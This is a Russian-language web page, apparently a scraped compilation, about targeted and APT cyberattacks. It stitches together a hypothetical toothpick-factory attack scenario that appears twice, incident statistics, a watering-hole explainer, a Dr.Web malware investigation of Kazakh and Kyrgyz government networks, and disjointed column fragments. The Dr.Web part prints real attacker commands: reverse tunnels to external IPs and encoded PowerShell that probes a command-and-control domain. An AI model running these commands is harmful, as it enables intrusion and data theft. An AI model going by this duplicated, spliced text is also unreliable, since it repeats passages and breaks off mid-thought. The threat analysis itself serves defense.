3 просмотров
Рейтинг статьи
1 звезда2 звезды3 звезды4 звезды5 звезд
Загрузка...

Целевые атаки (включая APT)

Содержание

Целевые атаки (включая APT)

Целевые атаки — это любые нападения киберпреступников на конкретную выбранную ими цель. Такие операции противопоставляются массовым атакам с помощью вирусов или других вредоносных программ, где жертва выбирается по принципу доступности. Обнаружив сопротивление, робот массовой атаки отступает и переключается на другую, хуже защищенную цель.

Для целевых же атак характерен взлом и обход защиты жертвы со все более глубоким проникновением в информационную систему. Если массовая атака обычно направлена против индивидуальных пользователей интернета, то целевая — против корпоративных сетей. Среди целевых нападений ярко выделяются атаки типа APT (Advanced Persistent Threat) — усовершенствованный сценарий, в котором используются уязвимости 0-day, пробивающие любую защиту. Данный тип атаки очень дорогостоящ и требует привлечения высококлассных специалистов. Наиболее известная APT-атака — внедрение червя Stuxnet и нарушение работы иранских ядерных комплексов с его помощью.

Вообще целевая атака может быть простой в техническом плане, однако пройти успешно с учетом всех особенностей атакуемой жертвы. Таким образом, APT — это всегда целевая атака, но далеко не каждая целевая атака — это APT.

Традиционно целевая атака проводится в несколько этапов: анализ «поверхности» проникновения в информационную систему; эксплуатация уязвимости с установкой на устройства жертвы дистанционно управляемого ПО; закрепление в системе с подавлением средств защиты, блокировкой контрольных систем и уничтожением следов проникновения; установка целевого ПО и его эксплуатация. Задачи целевых атак могут быть самыми разнообразными: получение доступа к секретной информации, вмешательство в работу ключевых систем жертвы, вывод оборудования из строя или нанесение другого вреда. Часто основной мишенью для целевой атаки является не компьютерная система, а сам бизнес как таковой.

Как выглядят современные целевые атаки

Целевые кибератаки отличаются от массовых хакерских атак тем, что направлены на конкретную компанию или организацию. Такие атаки максимально эффективны, поскольку спланированы и персонализированы с использованием собранной о жертве информации. Всё начинается со сбора сведений. Как правило, это самая длительная и трудоёмкая часть операции. А далее нужно подготовить и провести нападение. Со стороны всё выглядит довольно сложно и кажется, что провернуть такое под силу лишь элитным взломщикам. Однако реальность выглядит иначе.

Если в 2017 году доля нецелевых атак составляла 90%, а целевыми было всего 9,9%, в 2018 и 2019 году наблюдается устойчивый рост именно целевых атак. Если они настолько сложны в исполнении, почему их становится больше? И как проводятся современные целевые атаки, почему хакеры переключаются с массовых атак на таргетированные? Почему количество таких инцидентов, связанных с известными кибергруппировками, не так велико, как может показаться? Давайте разбираться.

Представим себе группу хакеров, которые решили провести атаку на завод, выпускающий фигурные зубочистки, чтобы похитить секрет их производства и продать его конкурентам. Рассмотрим, из каких этапов может состоять такая атака и какие инструменты для этого понадобятся.

Этап 1. Сбор информации

Хакерам нужно собрать как можно больше сведений о заводе, его руководстве и сотрудниках, сетевой инфраструктуре, а также о поставщиках и заказчиках. Для этого злоумышленники исследуют с помощью сканера уязвимостей сайт завода и все IP-адреса, принадлежащие предприятию. По публичным источникам составляется список сотрудников, изучаются их профили в соцсетях и сайты, которые они постоянно посещают. На основании собранной информации готовится план атаки и выбираются все необходимые утилиты и сервисы.

Инструменты: сканер уязвимостей, сервисы по продаже логов веб-сайтов, похищенные учётные данные электронной почты и сайтов.

Этап 2. Организация точек входа

Используя собранную информацию, хакеры готовят проникновение в сеть компании. Наиболее простой способ — это фишинговые письма с вредоносными вложениями или ссылками.

Преступникам не нужно владеть навыками социальной инженерии или разработки веб-эксплойтов для разных версий браузера — всё необходимое доступно в виде сервисов на хакерских форумах и в даркнете. За относительно небольшую плату эти специалисты подготовят фишинговые письма по собранным данным. Вредоносный контент для сайтов также можно приобрести как услугу «malicious-code-installation-as-a-service». При этом заказчику не понадобится вникать в детали реализации. Скрипт автоматически определит браузер и платформу жертвы и проэксплуатирует, воспользуется соответствующей версией эксплойта для внедрения и проникновения на устройство.

Инструменты: сервис «вредоносный код как услуга», сервис по разработке вредоносных фишинговых писем.

Этап 3. Соединение с управляющим сервером

После проникновения в сеть завода хакерам нужен плацдарм для закрепления и проведения дальнейших действий. Это может быть скомпрометированный компьютер с установленным бэкдором, принимающим команды от управляющего сервера на выделенном «абузоустойчивом» хостинге (или «жалобоустойчивый», он же «пуленепробиваемый» или BPHS — bulletproof hosting service). Другой способ предполагает организацию управляющего сервера прямо внутри инфраструктуры предприятия, в нашем случае завода. При этом не придётся скрывать трафик между установленным в сети вредоносом и сервером.


ИСТОЧНИК: TREND MICRO

На киберпреступных маркетах предлагаются различные варианты таких серверов, выполненные в виде полноценных программных продуктов, на которые даже предоставляется техническая поддержка.

Инструменты: «жалобоустойчивый» (пуленепробиваемый) хостинг, С&C server-as-a-service.

Этап 4. Боковые перемещения

Далеко не факт, что доступ на первый сдавшийся скомпромитированный компьютер в инфраструктуре завода даст возможность получить сведения о производстве фигурных зубочисток. Чтобы добраться до них, требуется выяснить, где хранится главный секрет и как до него добраться.

Этот этап называют «боковыми перемещениями» (lateral movement). Как правило, для его проведения используются скрипты, автоматизирующие сканирование сети, получение административных привилегий, снятие дампов с баз данных и поиск хранящихся в сети документов. Скрипты могут использовать утилиты операционных систем или загружать оригинальные разработки, доступные за дополнительную плату.

Инструменты: скрипты для сканирования сети, получения административных привилегий, слива данных и поиска документов.

Этап 5. Сопровождение атаки

Времена, когда для сопровождения атаки хакерам приходилось сидеть, уткнувшись в терминал, и непрерывно стучать по клавишам, набирая различные команды, ушли в прошлое. Современные киберпреступники используют для координации своей работы удобные веб-интерфейсы, панели и дашборды. Стадии проведения атаки отображаются в виде наглядных графиков, оператор получает уведомления о возникающих проблемах, причём для их решения могут предлагаться различные варианты действий.

Инструменты: веб-панель управления атакой

Этап 6. Хищение информации

Как только необходимые сведения обнаружены, необходимо максимально быстро и незаметно передать её из сети завода хакерам. Передачу нужно замаскировать под легитимный трафик, чтобы система DLP ничего не заметила. Для этого хакеры могут использовать защищённые соединения, шифрование, упаковку и стеганографию.

Инструменты: крипторы, шифраторы, VPN-туннели, DNS-туннели.

Результат атаки

Наши гипотетические хакеры с лёгкостью проникли в сеть завода, нашли необходимую заказчику информацию и похитили её. Всё, что им для этого потребовалось, — относительно небольшая сумма на аренду хакерских инструментов, которую они с лихвой компенсировали, продав секрет зубочисток конкурентам.

Выводы

Всё необходимое для проведения целевых атак легко доступно в даркнете и на хакерских форумах. Купить или арендовать инструментарий может любой желающий, причём уровень предложения настолько высок, что продавцы предлагают техподдержку и постоянно снижают цены. При таком раскладе нет смысла тратить время, стреляя из пушки по колибри и делать широкомасштабные вредоносные кампании. Значительно бо́льшую отдачу принесут несколько целевых атак.

Читать еще:  Ошибка при удалении Не удалось найти этот элемент

Элитные хакерские группировки тоже идут в ногу с трендами и диверсифицируют риски. Они понимают, что проведение атак — вещь опасная, хотя и прибыльная. Во время подготовки атак и в паузах между ними тоже хочется кушать, а значит, дополнительный доход не помешает. Так почему не дать другим воспользоваться своими разработками за достойное вознаграждение? Это породило массовое предложение хакерских услуг в аренду и по законам рынка привело к снижению их стоимости.


ИСТОЧНИК: TREND MICRO

В результате порог входа в сегмент целевых атак понизился, и аналитические компании год за годом отмечают рост их количества.

Ещё одно следствие доступности инструментария на киберпреступных маркетплейсах состоит в том, что теперь атаки APT-группировок значительно сложнее отличить от атак, проводимых преступниками, которые берут их инструментарий в аренду. Таким образом, защита от APT и неорганизованных киберпреступников требует практически одинаковых мероприятий, хотя для противостояния APT нужно больше ресурсов.

В качестве эмпирического критерия, по которым выявляются действия APT-хакеров, остаются только сложность и оригинальность проводимых атак, использование уникальных разработок и эксплойтов, недоступных на андерграундных маркетплейсах, более высокий уровень владения инструментарием.

В реальности инцидентов намного больше

Только 22% компаний, у которых были обнаружены признаки вредоносной активности, обратились за услугой по реагированию на инцидент.

Часто клиенты Лаборатории Касперского обращаются за экспертным анализом данных, собранных с использованием автоматических средств мониторинга. В результате исследования предоставленных данных были получены следующие результаты:

81% организаций, предоставивших данные для анализа, имели признаки вредоносной активности во внутренней сети.

У каждой третьей компании обнаружена активность, свидетельствующая о возможной .

Для трех ключевых категорий организаций были выявлены основные тенденции, связанные с угрозами безопасности.

Финансовые организацииГосударственные организацииПромышленные компании
В финансовых организациях в полтора раза чаще (54%), чем среди всех организаций, была обнаружена активность, являющаяся признаком таргетированной атаки.У 95% государственных организаций обнаружены признаки вредоносной активности, что на 14% больше, чем среди всех организаций в общем.Промышленные компании чаще становятся жертвами банкеров. Активность, соответствующая данному ВПО, обнаружена у 27% компаний.
У малой доли финансовых организаций обнаружены признаки заражения шифровальщиком (12%) или банкером (8%).У 45% государственных организаций зафиксированы обращения к ресурсам, связанным с таргетированными атаками.Промышленные компании в меньшей степени подвержены таргетированным атакам (15%) или атакам шифровальщиков (25%).

Watering Hole

Кроме таргетированных атак с использованием социальных сетей, не меньшую опасность представляют атаки, получившие название «Watering Hole». Основная идея атаки этого типа – найти и заразить те сайты, которые с наибольшей вероятностью посещают сотрудники атакуемой компании. Недавно в США был заражен сайт Министерства труда, но предполагается, что истинной целью атаки было Министерство энергетики: злоумышленники рассчитывали заразить компьютеры сотрудников Министерства энергетики, которые регулярно посещают сайт Министерства труда.

Когда сотрудник атакуемой компании открывает зараженный сайт, внедренный в тело страницы код незаметно перенаправляет браузер на сайт злоумышленников, содержащий набор 0-day эксплойтов. Примечательно, что размещаемое на зараженных сайтах вредоносное ПО – например, серверный скрипт – часто действует избирательно, внедряя вредоносный код в отправляемую пользователю страницу только если пользователь с большой вероятностью имеет отношение к выбранной компании-цели. Таким образом злоумышленники стараются скрыть таргетированную атаку от антивирусных компаний и экспертов в области информационной безопасности.

Злоумышленникам стараются заражать легитимные сайты, которым пользователи доверяют. В таких случаях даже когда для запуска эксплойта от пользователя требуются дополнительные действия – включить javascript, разрешить выполнение java-апплета, подтвердить исключение безопасности и т.д. – они с большой вероятностью нажимают «Разрешить» и «Подтвердить», не подозревая об угрозе.

Исследование APT-атак на государственные учреждения Казахстана и Киргизии

#1 News Robot

Creator of the News

  • Dr.Web Staff
  • 7 475 Сообщений:
  • 20 июля 2020 года

    Введение

    Как объект изучения целевые кибератаки на крупные предприятия и государственные учреждения представляют большой интерес для специалистов по информационной безопасности. Исследование таких инцидентов позволяет проанализировать стратегию и инструменты, используемые злоумышленниками для взлома компьютерных систем, и выработать соответствующие меры противодействия. Программное обеспечение, задействованное в таргетированных атаках, как правило является уникальным, так как разрабатывается в соответствии с целями и задачами нападавших, и не афишируется публично. По сравнению с массовыми угрозами образцы такого ПО редко попадают «на стол» к исследователям. Кроме того, при проведении целевых атак используются комплексные механизмы сокрытия следов вредоносной активности, что усложняет обнаружение постороннего присутствия внутри инфраструктуры атакованной организации.

    В марте 2019 года в компанию «Доктор Веб» обратился клиент из государственного учреждения Республики Казахстан по вопросу наличия вредоносного ПО на одном из компьютеров корпоративной сети. Это обращение послужило поводом к началу расследования, по результатам которого специалисты нашей компании обнаружили и впервые описали группу троянских программ, использующихся для полномасштабной целевой атаки на учреждение. Имеющиеся в нашем распоряжении материалы позволили получить представление об инструментах и целях злоумышленников, проникших во внутреннюю компьютерную сеть. В ходе расследования было установлено, что сетевая инфраструктура учреждения была скомпрометирована как минимум с декабря 2017 года.

    Кроме того, в феврале 2020 года в компанию «Доктор Веб» обратились представители государственного учреждения Киргизской Республики с признаками заражения корпоративной сети. Наша экспертиза установила наличие в сети ряда вредоносных программ, некоторые модификации которых также использовались в атаке на организацию в Казахстане. Анализ показал, что, как и в предыдущем случае, заражение началось задолго до обращения — в марте 2017 года.

    Учитывая, что несанкционированное присутствие в обеих инфраструктурах продолжалось на протяжении как минимум трех лет, а также то, что при изучении отчетов с серверов были выявлены совершенно разные семейства троянских программ, мы допускаем, что за этими атаками могут стоять сразу несколько хакерских групп. При этом некоторые из использованных троянов хорошо известны: часть из них является эксклюзивными инструментами известных APT-групп, другая часть — используется различными APT-группами Китая.

    Общие сведения об атаке и используемые инструменты

    Нам удалось подробно изучить информацию с нескольких внутрисетевых серверов, принадлежащих пострадавшим учреждениям Казахстана и Киргизии. Все рассматриваемые в исследовании устройства работают под управлением операционных систем Microsoft Windows.

    Вредоносные программы, которые применялись в таргетированной атаке, можно условно разделить на две категории:

    • массовые, которые ставили на большинство компьютеров сети;
    • специализированные, которые ставили на серверы, представляющие особый интерес для атакующего.

    Изученные образцы вредоносных программ и используемые злоумышленниками утилиты позволяют предполагать следующий сценарий атаки. После успешного эксплуатирования уязвимостей и получения доступа к компьютеру сети злоумышленники загружали на него одну из модификаций трояна семейства BackDoor.PlugX. Модули полезной нагрузки трояна позволяли удаленно управлять инфицированным компьютером и использовать его для дальнейшего продвижения по сети. Другим трояном, предположительно использующимся для первичного заражения, был BackDoor.Whitebird.1. Бэкдор предназначался для 64-разрядных операционных систем и имел достаточно универсальную функциональность: поддержку зашифрованного соединения с управляющим сервером, а также функции файлового менеджера, прокси и удаленного управления через командную оболочку.

    После установления присутствия в сети хакерская группа использовала специализированное вредоносное ПО для решения поставленных задач. Распределение специализированных троянских программ по инфицированным устройствам представлено ниже.

    Из указанных троянов особого внимания заслуживает семейство XPath, представители которого, по нашей информации, ранее публично описаны не были. Семейство обладает руткитом для сокрытия сетевой активности и следов присутствия в скомпрометированной системе, обнаружить который удалось при помощи антируткита Dr.Web, установленного на атакованном сервере. Изученные нами образцы были скомпилированы в 2017-2018 годах. При этом в основе этих программ лежат проекты с открытым исходных кодом, вышедшие на несколько лет раньше. Так, в исследованных образцах использовались версии пакета WinDivert 2013-2015 годов. Это косвенно указывает на то, что первые модификации XPath также могли быть разработаны в этот период.

    XPath является модульным трояном, каждый компонент которого соответствует определенной стадии работы вредоносной программы. Процесс заражения начинается с работы установщика компонентов, детектируемого как Trojan.XPath.1. Установщик использует зашитую в его теле зашифрованную конфигурацию и запускает полезную нагрузку либо путем установки драйвера, либо методом COM Hijacking. Программа использует системный реестр для хранения своих модулей, при этом используется как шифрование, так и сжатие данных.

    Читать еще:  Free hack как пользоваться программой. WhatsApp Sniffer: описание программы и как защитить себя. Как обезопасить себя от WhatsApp Sniffer

    Trojan.XPath.2 является драйвером и служит для сокрытия присутствия вредоносной активности в скомпрометированной системе, параллельно запуская другой модуль. Драйвер имеет китайские цифровые подписи, а его работа основана на проектах с открытым исходным кодом. В отличие от других компонентов, хранимых в системном реестре, файлы драйвера располагаются на диске, при этом программа работает скрытно. Помимо сокрытия файла драйвера на диске в задачи компонента входит внедрение загрузчика полезной нагрузки в процесс lsass.exe, а также маскировка сетевой активности трояна. Сценарий работы меняется в зависимости от версии операционной системы.

    Оригинальное название третьего компонента — PayloadDll.c. Библиотека, детектируемая как Trojan.XPath.3, является промежуточным модулем и служит для внедрения в процесс svhost.exe полезной нагрузки, которая сохранена в реестре, методом COM Hijacking.

    Основная функциональность содержится в модуле полезной нагрузки, детектируемом как Trojan.XPath.4. Компонент написан на C++, и в его основе также лежат проекты с открытым исходным кодом. Как и большинство рассмотренных в исследовании вредоносных программ, этот троян предназначен для получения несанкционированного доступа к зараженным компьютерам и кражи конфиденциальных данных. Его особенностью является способность функционировать в двух режимах. Первый — работа в режиме клиента (Client Mode). В этом режиме троян соединяется с управляющим сервером и ожидает входящие команды. Второй — работа в режиме агента (Agent Mode). В этом режиме Trojan.XPath.4 выполняет функции сервера: он прослушивает определенные порты, ожидая подключения к ним других клиентов и отправляя им команды. Таким образом, разработчики предусмотрели сценарий развертывания локального управляющего сервера внутри атакуемой сети для перенаправления команд от внешнего управляющего сервера зараженным компьютерам внутри сети.

    Подробное описание работы программ семейства XPath находится в PDF-версии исследования, а также доступно в вирусной библиотеке Dr.Web.

    Среди других интересных находок — особенность реализации доступа к командной оболочке трояна Mirage. Для перенаправления ввода-вывода командной оболочки вредоносная программа использовала файлы, которые мы смогли получить с зараженного сервера. Таким образом удалось увидеть команды, выполнявшиеся злоумышленниками с помощью представленной функции трояна, а также полученные в ответ данные:

    Запускавшийся windbg.exe файл представлял собой сканер TCP/UPD-портов PortQry.

    В ходе расследования мы обнаружили свидетельства, косвенно подтверждающие связь таргетированных атак на учреждения государств Центральной Азии. Так, один из найденных образцов BackDoor.PlugX.38 использовал в качестве управляющего сервера домен nicodonald[.]accesscam[.]org, который использовался и в качестве управляющего сервера для BackDoor.Apper.14, также известного под названием ICEFOG NG. Несколько лет назад бэкдор этого семейства был обнаружен нами в фишинговом письме, направленном в одно из государственных учреждений Казахстана. Кроме того, RTF-документ, устанавливающий этот образец BackDoor.Apper.14, впервые был загружен на VirusTotal из Казахстана 19 марта 2019 года.

    Интересной находкой в рамках инцидента в Киргизии стал бэкдор Logtu, обнаруженный на зараженном сервере вместе с Mikroceen. Помимо похожего набора вредоносного ПО, использующегося злоумышленниками, именно Mikroceen позволяет говорить о возможной связи двух атак: образец этого узкоспециализированного бэкдора был найден в обеих сетях и в обоих случаях устанавливался на контроллер домена.

    В ходе поиска образцов, имеющих отношение к данным атакам, был найден специально подготовленный бэкдор, реализующий BIND Shell-доступ к командной оболочке. Путь до отладочных символов содержит название проекта на китайском языке — 正向马源码, что может указывать на соответствующее происхождение трояна.

    Помимо вредоносного ПО для дальнейшего продвижения по сети злоумышленники использовали следующие публично доступные утилиты:

    • Mimikatz
    • TCP Port Scanner V1.2 By WinEggDrop
    • Nbtscan
    • PsExec
    • wmiexec.vbs
    • goMS17-010
    • ZXPortMap v1.0 By LZX
    • Earthworm
    • PortQry version 2.0 GOLD

    Ниже представлены примеры запуска некоторых из перечисленных утилит.

    • ZXPortMap: vmwared.exe 21 46.105.227.110 53
    • Earthworm: cryptsocket.exe -s rssocks -d 137.175.79.212 -e 53

    APT-группа также активно использовала собственные PowerShell-скрипы для сбора информации об инфицированном компьютере, других устройствах сети, проверки управляющих серверов с зараженного компьютера и подобных задач. Кроме того, мы нашли PowerShell-скрипт, предназначенный для выгрузки из Microsoft Exchange Server всего содержимого почтовых ящиков нескольких сотрудников организации.

    Примеры некоторых PowerShell-скриптов, выполненных на зараженных серверах:

    powershell -enc DQAKADUAMwAsADMAOAA5ACAAfAAgACUAewBlAGMAaABvACAAKAAoAG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAGMAcABDAGwAaQBlAG4AdAApAC4AQwBvAG4AbgBlAGMAdAAoACIAdgAuAG4AbgBuAGMAaQB0AHkALgB4AHkAegAiACwAJABfACkAKQAgACIAUABvAHIAdAAgACQAaQAgAGkAcwAgAG8AcABlAG4AIQAiAH0AIAAyAD4AJABuAHUAbABsAA0ACgA= powershell -nop -enc DQAKADIAMQAsADIAMgAsADIANQAgAHwAIAAlAHsAZQBjAGgAbwAgACgAKABuAGUAdwAtAG8AYgBqAGUAYwB0ACAATgBlAHQALgBTAG8AYwBrAGUAdABzAC4AVABjAHAAQwBsAGkAZQBuAHQAKQAuAEMAbwBuAG4AZQBjAHQAKAAiAHYALgBuAG4AbgBjAGkAdAB5AC4AeAB5AHoAIgAsACQAXwApACkAIAAiAFAAbwByAHQAIAAkAGkAIABpAHMAIABvAHAAZQBuACEAIgB9ACAAMgA+ACQAbgB1AGwAbAANAAoA powershell -enc IAA1ADMALAA1ADQALAA4ADAALAA0ADQAMwAgAHwAIAAlAHsAZQBjAGgAbwAgACgAKABuAGUAdwAtAG8AYgBqAGUAYwB0ACAATgBlAHQALgBTAG8AYwBrAGUAdABzAC4AVABjAHAAQwBsAGkAZQBuAHQAKQAuAEMAbwBuAG4AZQBjAHQAKAAiAHYALgBuAG4AbgBjAGkAdAB5AC4AeAB5AHoAIgAsACQAXwApACkAIAAiAFAAbwByAHQAIAAkAGkAIABpAHMAIABvAHAAZQBuACEAIgB9ACAAMgA+ACQAbgB1AGwAbAANAAoA powershell.exe -executionpolicy bypass -WindowStyle Hidden -File C:programdatax.ps1

    Заключение

    В ходе расследования нашим специалистам удалось найти сразу несколько семейств троянских программ, используемых в этих атаках. Анализ образцов и вредоносной активности показал, что взлом сетевой инфраструктуры произошел задолго до обнаружения первых признаков заражения сотрудниками организации. К сожалению, такой сценарий — один из атрибутов успешных APT-атак, так как значительные ресурсы вирусописателей всегда направлены на сокрытие своего присутствия в системе.

    За скобками исследования остался первичный вектор заражения, а также общая картина заражения всей инфраструктуры. Мы уверены, что описанные в исследовании трояны — лишь часть вредоносного ПО, задействованного в этих атаках. Механизмы, используемые хакерами, многократно затрудняют не только обнаружение несанкционированного вторжения, но и возврат контроля над сетевыми объектами.

    Для минимизации рисков необходим постоянный мониторинг внутрисетевых ресурсов, в особенности тех серверов, которые представляют повышенный интерес для злоумышленников, — контроллеры домена, почтовые сервера, интернет-шлюзы. В случае компрометации системы необходим оперативный и правильный анализ ситуации для разработки адекватных мер противодействия. «Доктор Веб» не только создает средства антивирусной защиты, но и оказывает услуги по расследованию вирусозависимых компьютерных инцидентов, к числу которых относятся и целевые атаки. При подозрении на вредоносную активность в корпоративной сети следует обращаться за квалифицированной помощью в вирусную лабораторию «Доктор Веб». Своевременное реагирование позволит минимизировать ущерб и предотвратить тяжелейшие последствия, которые влекут за собой таргетированные компьютерные атаки.

    Противодействие

    Конечно, этап противодействия должен начинаться раньше, а не после всех описанных стадий. Но иногда бывает так, что Василия начинают искать уже после того, как он скрылся с ценными данными. И зачастую это происходит не только из-за некомпетентности защищающейся стороны. Просто Василий имел достаточно времени, чтобы изучить жертву, прежде чем начал какие-то активные действия, и хорошо знал обо всех защитных системах. Да и василиев зачастую много, а некоторые из них прячутся и среди внутренних сотрудников.

    Именно по описанным выше причинам мы постараемся узнать о Васе и его намерениях еще до того, как он реализует все стадии своей атаки. Для этого нужно научиться вовремя определять его появление в нашей инфраструктуре. Тому, как это делать, я посвящу следующие выпуски моей колонки.

    Денис Макрушин

    Специализируется на исследовании угроз и разработке технологий защиты от целевых атак. #InspiredByInsecure

    Классификация и способы целевых атак

    Можно выделить следующие типы атак:

    • Атака на конкретное предприятие. Основной задачей здесь является проникновение в информационную систему компании. Обычно производится рассылка сообщений с вредоносными вложениями, которая направлена на всех сотрудников компании и партнеров, с которыми у предприятия установлены доверительные отношения. Атакованы могут быть как рядовые сотрудники, так и руководство.
    • «Охота на китов» (англ. whaling). Это — атака на топ-менеджмент компании с целью получения доступа к экономической или стратегической информации. Часто нападение производится с помощью сайтов, которые посещают руководители компаний определенного сектора экономики. Такие атаки могут быть связаны со шпионажем или конкурентной разведкой.
    • Атака на отрасли экономики — масштабный вид, нацеленный на крупные организации — например, научно-исследовательские институты. Целью является хищение ценной информации. Как правило, подобные атаки проводятся под заказ.
    • «Цепочка» (англ. Kill Chain). Кибератака изначально может быть проведена против людей, никак напрямую не связанных с целевой организацией — например, семьи одного из сотрудников. В таком случае заражению подвергается сперва компьютерная система супруга или супруги (доверенного лица) сотрудника организации, далее от их имени отправляется ссылка на какую-либо интересную новость или фото, после чего проникновение в систему продвигается по цепочке вплоть до достижения желаемой цели.

    Таким образом, нападение может быть выполнено либо через электронную почту, либо через веб-ресурсы с загрузкой вредоносных компонентов из интернета.

    Как выглядят современные целевые атаки

    Целевые кибератаки отличаются от массовых хакерских атак тем, что направлены на конкретную компанию или организацию. Такие атаки максимально эффективны, поскольку спланированы и персонализированы с использованием собранной о жертве информации. Всё начинается со сбора сведений. Как правило, это самая длительная и трудоёмкая часть операции. А далее нужно подготовить и провести нападение. Со стороны всё выглядит довольно сложно и кажется, что провернуть такое под силу лишь элитным взломщикам. Однако реальность выглядит иначе.

    Читать еще:  3D реконструкция лица с помощью смартфона? Изи!

    Если в 2017 году доля нецелевых атак составляла 90%, а целевыми было всего 9,9%, в 2018 и 2019 году наблюдается устойчивый рост именно целевых атак. Если они настолько сложны в исполнении, почему их становится больше? И как проводятся современные целевые атаки, почему хакеры переключаются с массовых атак на таргетированные? Почему количество таких инцидентов, связанных с известными кибергруппировками, не так велико, как может показаться? Давайте разбираться.

    Представим себе группу хакеров, которые решили провести атаку на завод, выпускающий фигурные зубочистки, чтобы похитить секрет их производства и продать его конкурентам. Рассмотрим, из каких этапов может состоять такая атака и какие инструменты для этого понадобятся.

    Этап 1. Сбор информации

    Хакерам нужно собрать как можно больше сведений о заводе, его руководстве и сотрудниках, сетевой инфраструктуре, а также о поставщиках и заказчиках. Для этого злоумышленники исследуют с помощью сканера уязвимостей сайт завода и все IP-адреса, принадлежащие предприятию. По публичным источникам составляется список сотрудников, изучаются их профили в соцсетях и сайты, которые они постоянно посещают. На основании собранной информации готовится план атаки и выбираются все необходимые утилиты и сервисы.

    Инструменты: сканер уязвимостей, сервисы по продаже логов веб-сайтов, похищенные учётные данные электронной почты и сайтов.

    Этап 2. Организация точек входа

    Используя собранную информацию, хакеры готовят проникновение в сеть компании. Наиболее простой способ — это фишинговые письма с вредоносными вложениями или ссылками.

    Преступникам не нужно владеть навыками социальной инженерии или разработки веб-эксплойтов для разных версий браузера — всё необходимое доступно в виде сервисов на хакерских форумах и в даркнете. За относительно небольшую плату эти специалисты подготовят фишинговые письма по собранным данным. Вредоносный контент для сайтов также можно приобрести как услугу «malicious-code-installation-as-a-service». При этом заказчику не понадобится вникать в детали реализации. Скрипт автоматически определит браузер и платформу жертвы и проэксплуатирует, воспользуется соответствующей версией эксплойта для внедрения и проникновения на устройство.

    Инструменты: сервис «вредоносный код как услуга», сервис по разработке вредоносных фишинговых писем.

    Этап 3. Соединение с управляющим сервером

    После проникновения в сеть завода хакерам нужен плацдарм для закрепления и проведения дальнейших действий. Это может быть скомпрометированный компьютер с установленным бэкдором, принимающим команды от управляющего сервера на выделенном «абузоустойчивом» хостинге (или «жалобоустойчивый», он же «пуленепробиваемый» или BPHS — bulletproof hosting service). Другой способ предполагает организацию управляющего сервера прямо внутри инфраструктуры предприятия, в нашем случае завода. При этом не придётся скрывать трафик между установленным в сети вредоносом и сервером.


    ИСТОЧНИК: TREND MICRO

    На киберпреступных маркетах предлагаются различные варианты таких серверов, выполненные в виде полноценных программных продуктов, на которые даже предоставляется техническая поддержка.

    Инструменты: «жалобоустойчивый» (пуленепробиваемый) хостинг, С&C server-as-a-service.

    Этап 4. Боковые перемещения

    Далеко не факт, что доступ на первый сдавшийся скомпромитированный компьютер в инфраструктуре завода даст возможность получить сведения о производстве фигурных зубочисток. Чтобы добраться до них, требуется выяснить, где хранится главный секрет и как до него добраться.

    Этот этап называют «боковыми перемещениями» (lateral movement). Как правило, для его проведения используются скрипты, автоматизирующие сканирование сети, получение административных привилегий, снятие дампов с баз данных и поиск хранящихся в сети документов. Скрипты могут использовать утилиты операционных систем или загружать оригинальные разработки, доступные за дополнительную плату.

    Инструменты: скрипты для сканирования сети, получения административных привилегий, слива данных и поиска документов.

    Этап 5. Сопровождение атаки

    Времена, когда для сопровождения атаки хакерам приходилось сидеть, уткнувшись в терминал, и непрерывно стучать по клавишам, набирая различные команды, ушли в прошлое. Современные киберпреступники используют для координации своей работы удобные веб-интерфейсы, панели и дашборды. Стадии проведения атаки отображаются в виде наглядных графиков, оператор получает уведомления о возникающих проблемах, причём для их решения могут предлагаться различные варианты действий.

    Инструменты: веб-панель управления атакой

    Этап 6. Хищение информации

    Как только необходимые сведения обнаружены, необходимо максимально быстро и незаметно передать её из сети завода хакерам. Передачу нужно замаскировать под легитимный трафик, чтобы система DLP ничего не заметила. Для этого хакеры могут использовать защищённые соединения, шифрование, упаковку и стеганографию.

    Инструменты: крипторы, шифраторы, VPN-туннели, DNS-туннели.

    Результат атаки

    Наши гипотетические хакеры с лёгкостью проникли в сеть завода, нашли необходимую заказчику информацию и похитили её. Всё, что им для этого потребовалось, — относительно небольшая сумма на аренду хакерских инструментов, которую они с лихвой компенсировали, продав секрет зубочисток конкурентам.

    Выводы

    Всё необходимое для проведения целевых атак легко доступно в даркнете и на хакерских форумах. Купить или арендовать инструментарий может любой желающий, причём уровень предложения настолько высок, что продавцы предлагают техподдержку и постоянно снижают цены. При таком раскладе нет смысла тратить время, стреляя из пушки по колибри и делать широкомасштабные вредоносные кампании. Значительно бо́льшую отдачу принесут несколько целевых атак.

    Элитные хакерские группировки тоже идут в ногу с трендами и диверсифицируют риски. Они понимают, что проведение атак — вещь опасная, хотя и прибыльная. Во время подготовки атак и в паузах между ними тоже хочется кушать, а значит, дополнительный доход не помешает. Так почему не дать другим воспользоваться своими разработками за достойное вознаграждение? Это породило массовое предложение хакерских услуг в аренду и по законам рынка привело к снижению их стоимости.


    ИСТОЧНИК: TREND MICRO

    В результате порог входа в сегмент целевых атак понизился, и аналитические компании год за годом отмечают рост их количества.

    Ещё одно следствие доступности инструментария на киберпреступных маркетплейсах состоит в том, что теперь атаки APT-группировок значительно сложнее отличить от атак, проводимых преступниками, которые берут их инструментарий в аренду. Таким образом, защита от APT и неорганизованных киберпреступников требует практически одинаковых мероприятий, хотя для противостояния APT нужно больше ресурсов.

    В качестве эмпирического критерия, по которым выявляются действия APT-хакеров, остаются только сложность и оригинальность проводимых атак, использование уникальных разработок и эксплойтов, недоступных на андерграундных маркетплейсах, более высокий уровень владения инструментарием.

    Проблема решения

    Получается, что избежать риска компрометации фактически невозможно. Соответственно, нужны системы выявления неизвестных атак в уже скомпрометированной среде. Этот класс решений носит гордое название post-breach («после взлома») и чаще всего решает задачу response/mitigation, то есть реагирования и смягчения.

    А вот методов и построенных на их основе решений для своевременного детекта угроз (post-breach detection) в действительности не так много. Например, один из них — это сети ловушек, которые широко известны как «ханипоты».

    Уровни, на которых может быть реализована система ловушек (по мнению Gartner)

    Правильно сделанная ловушка действительно может помочь обнаружить целенаправленную атаку на определенной стадии. Но при этом классический ханипот вряд ли чем-то поможет в выявлении других точек присутствия атакующего.

    Известны способы адаптивного развертывания систем ловушек, а также поиска аномалий в функционировании компонентов системы. Гораздо сложнее найти рекомендации, как выбирать параметры развертывания ханипотов. Сколько нужно фейковых рабочих станций в сети? Какие фейковые аккаунты и на каких машинах создать? Еще сложнее проанализировать полученные таким способом данные. «Окей, Google, кто-то воспользовался фейковой учеткой на компьютере нашего бухгалтера. Что теперь делать?»

